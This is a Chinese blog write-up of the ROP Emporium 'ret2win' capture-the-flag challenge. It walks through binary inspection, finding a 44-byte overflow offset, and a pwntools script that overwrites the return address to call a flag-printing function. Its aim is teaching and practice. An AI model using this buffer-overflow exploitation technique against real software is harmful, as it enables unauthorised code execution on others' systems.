ROP Emporium-ret2win

最新推荐文章于 2024-07-24 14:08:33 发布
最新推荐文章于 2024-07-24 14:08:33 发布
阅读量288 收藏
点赞数
分类专栏: # PWN 文章标签: pwn 靶机 安全 网络安全 rop
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/galaxy3000/article/details/122305107
版权

文章目录

概述

ROP Emporium是一个通过一系列的挑战来学习ROP(面向返回的编程)的网站,ROP常用于PWN的场景,本文记录的是第一个挑战ret2win,地址为https://ropemporium.com/challenge/ret2win.html

在这里插入图片描述

这里下载的是ret2win32

基本信息获取

检查程序的保护,发现NX启用

checksec ret2win32

在这里插入图片描述

查看程序中的字符串,发现bin/cat flag.txt字样

rabin2 -z ret2win32

[Strings]
nth paddr      vaddr      len size section type  string
―――――――――――――――――――――――――――――――――――――――――――――――――――――――
0   0x000006e0 0x080486e0 23  24   .rodata ascii ret2win by ROP Emporium
1   0x000006f8 0x080486f8 4   5    .rodata ascii x86\n
2   0x000006fd 0x080486fd 8   9    .rodata ascii \nExiting
3   0x00000708 0x08048708 95  96   .rodata ascii For my first trick, I will attempt to fit 56 bytes of user input into 32 bytes of stack buffer!
4   0x00000768 0x08048768 29  30   .rodata ascii What could possibly go wrong?
5   0x00000788 0x08048788 95  96   .rodata ascii You there, may I have your input please? And don't worry about null bytes, we're using read()!\n
6   0x000007eb 0x080487eb 10  11   .rodata ascii Thank you!
7   0x000007f6 0x080487f6 28  29   .rodata ascii Well done! Here's your flag:
8   0x00000813 0x08048813 17  18   .rodata ascii /bin/cat flag.txt

查看反汇编

objdump -d -M intel ret2win32

main()调用了pwnme()
在这里插入图片描述

pwnme()使用了read(),存在溢出
在这里插入图片描述

此外还存在函数ret2win(),能够查看flag,即刚才看到的字符串bin/cat flag.txt

在这里插入图片描述

解题思路

挑战的目的是得到flag内容,程序中已存在ret2win()能够读取flag,通过溢出控制返回地址到ret2win()地址即可。

获取偏移

生成随机字符串

pwndbg> cyclic 200
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab

在这里插入图片描述

计算偏移,得到44

pwndbg> cyclic -l 0x6161616c
44

代码

使用pwntools

from pwn import *

p = process('./ret2win32')
elf = context.binary = ELF('./ret2win32', checksec=False)


ret_address = elf.symbols.ret2win
info(ret_address)
offset = 44

payload = 'A' * offset + p32(ret_address)

p.sendline(payload)
p.recvuntil("Here's your flag:")
flag = p.recvall().strip('\n')
success(flag)
p.interactive()
galaxy3000
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
高级栈溢出技术—ROP实战(简介及ret2win
ChuMeng1999的博客
01-07 1266
目录预备知识关于ROP本系列rop实战题目的背景ret2win涉及知识点实验目的实验环境实验步骤一实验步骤二实验步骤三 预备知识 关于ROP ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。 ROP是一种攻击技术,其中攻击者使用堆栈的控制来在现有程序代码中的子程序中的返回指令之前,立即间接地执行精心挑选的指令或机器指令组。 本系列rop实战题目的背景 来自ROPEmpori
小白详解rop emporium
BadRer的博客
08-02 2090
小白详解rop emporium 前言 rop emporium网站上提供了许多构造rop的challenge,作为小白的我从这里开始,专注于rop链的构造。 ps:写完放了好久结果没投出去,我好菜啊-。- 题目 0x0 ret2win32 IDA打开,很容易找到溢出点 char s; // [esp+0h][ebp-28h]可以看出s距ebp的偏移为0x28 m...
ROP_Emporium_ret2win
Starr
03-23 625
文章目录1. ret2win32信息收集反汇编Exp2. ret2win反汇编Exp 题目下载地址:ROP Emporium 1. ret2win32 信息收集 $ file ret2win32 ret2win32: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=e1
rop emporium 2020】ret2win
^_^
02-06 408
这篇博客主要是关于rop emporium(2020年7月的版本)的ret2win这道题的学习记录 因为网上都是比较早版本的题解,所以写了这篇博客,不过这道题倒是变化不大。 题目链接:https://ropemporium.com/challenge/ret2win.html 32位 反编译后: int __cdecl main(int argc, const char **argv, const char **envp) { setvbuf(_bss_start, 0, 2, 0); puts.
ret2win Challenge1(x86-64)
u014377094的博客
02-10 324
ret2win 1 x64
ROP----The Solution For Ret2win
weixin_30924239的博客
06-05 530
App:ret2win https://ropemporium.com/binary/ret2win.zip https://ropemporium.com/binary/ret2win32.zip Target:Locate a method within the binary that you want to call and do so by overwriting a sa...
ROP Emporium x86_64 1~6题
CoLin的pwn小屋
04-09 3266
ROP Emporium x64 1-6题
rop-emporium:新型Rop Emporium 2020回收箱的解决方案
02-14
在"rop-emporium: 新型 ROP Emporium 2020 回收箱的解决方案"中,我们主要探讨的是如何解决这个平台在2020年7月更新后的32位和64位bin的挑战。这些挑战通常涉及找出特定的gadgets,组合它们以执行任意代码,最终达到...
0001-TIPS-2020-hxp-kernel-rop : ret2user
06-19
0001-TIPS-2020-hxp-kernel-rop : ret2user
Rompmporium漏洞:ROP Emporium漏洞
02-15
2. **Stack Pivot**:在许多ROP攻击中,攻击者需要改变程序的栈指针以控制执行流程。这可能涉及到找到并使用特定的gadgets。 3. **Value计算**:有时,攻击者需要计算特定值,这可能涉及到使用gadgets执行算术运算。...
Performing a ret2libc Attack-InVoLuNTaRy
04-24
### 执行ret2libc攻击——InVoLuNTaRy #### 一、ret2libc攻击简介 **ret2libc**(返回到libc或返回到C库)是一种攻击技术,它允许攻击者在无需注入shellcode的情况下控制目标系统中的易受攻击进程。这种攻击方式...
ROP之ret2alsolve(32位)详解
06-18
ROP之ret2alsolve(32位)详解
ROP Emporium ALL Challenge
Pwnpanda的博客
07-18 970
暑假刷题计划-0x00 水平有限,这些只是前面大部分题目的WP,最后几道题暂时没做 题目来源:ROP Emporium 工具&&环境:IDA Pro、gdb+peda、ROPgadget、radare2、Ubuntu 16 ROP: 一步一步学ROP之linux_x86篇 一步一步学ROP之linux_x64篇 友情链接: 大佬博客:https://firmian...
ARM pwn 入门 (3)
CoLin的pwn小屋
11-06 1062
ARM pwn 入门 (3)——ROP emporium 第1-2题
随机字符串
感动世界
11-12 1159
  #region 随机字符串  ///   /// 生成随机字符串  ///   /// 指定长度  /// 是否允许重复  /// 种子值[只需要第0个值,null表示使用默认种子值]  /// 字符集  ///   public static string Random( int Length, bool Repeat, int[] Seed, params char[] All )  { 
搭建Rop Webservice框架遇见的坑
carterslam的专栏
12-02 1176
Rop框架的作用以及导入所需要的jar包,配置rop.xml 和rop.properties网上有很多资料,这里不再赘述,说两个遇见的坑: 按照网上的资料, 天坑1:配置好后,在tomcat下面启动,错误信息如下: SEVERE: StandardWrapper.Throwable java.lang.NullPointerException at com.rop.RopServlet.i
从头复习ROP(持续更新中)
s1054436218的博客
10-02 618
从头复习ROP 一、前言   从考研结束就一直很浮躁,虽然在实习期间学习运用了一段时间web技术,但是新东西总是不想看,旧的东西又不断忘记。9月研究生开学,也算是新的开始了,沉下心来沉淀一些东西吧。感觉在学校的期间学习二进制是最合适的,所以潜下心来把二进制捡起来。   话不多说了,开始吧。 二、参考资料   大佬们的资料都很浅显易懂,作为基础知识一定要先读一下: 一步一步学...
利用ret2libc绕过DEP安全机制
_wells的博客
03-29 1165
文中的例子是引用了别人的,计作转载吧,具体哪里引用的忘记了数据执行保护:           DEP就是将非代码段的地址空间设置成不可执行属性,一旦系统从这些地址空间进行取指令时,CPU就是报内存违例异常,进而杀死进程。栈空间也被操作系统设置了不可执行属性,因此注入的Shellcode就无法执行了     导向系统库函数执行(ret2libc)攻击方法:        系统函数库(
大坝安全监测设备有哪些主要功能?
最新发布
yyth13276363312的博客
07-24 356
12。3. **实时预警和报警处理**:提供精准的安全预警信息,及时处理可能的危险情况12。1. **实时监测大坝的各项物理参数**:包括应变、位移、水位、流量等12。6. **环境量监测**:包括上/下游水位、气温、降水量等11
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值